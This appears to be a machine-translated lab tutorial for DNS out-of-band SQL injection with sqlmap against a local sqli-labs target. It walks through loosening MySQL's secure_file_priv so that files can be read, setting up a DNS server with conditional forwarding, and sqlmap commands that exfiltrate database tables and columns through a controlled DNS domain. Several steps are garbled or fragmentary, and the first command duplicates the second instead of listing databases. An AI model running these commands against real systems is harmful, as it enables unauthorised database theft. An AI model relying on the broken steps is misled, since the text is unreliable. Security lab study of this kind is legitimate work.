Reproduce dns out-band data combined with sqlmap

Set mysql's secure_file_priv attribute

If secure_file_priv is empty, you can read the directory of the disk
If secure_file_priv is D:\, you can read the files in the D disk
If secure_file_priv is null, load_file cannot load files
Add a sentence secure_file_priv=“”

Configure dns server

1.Add role

2.Add positiveFind

3. New host
IP addressFor the ip address of the virtual machine where sqlmap is located

Create aPan analysis

Use virtual machine ping just set on the server, and enter tcpdump -n port 53 in kali; check the information returned.


4. Create conditional repeater

SQLMap uses out-of-band dns injection

Fetch library

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables

Get table

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables

Get Columns

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns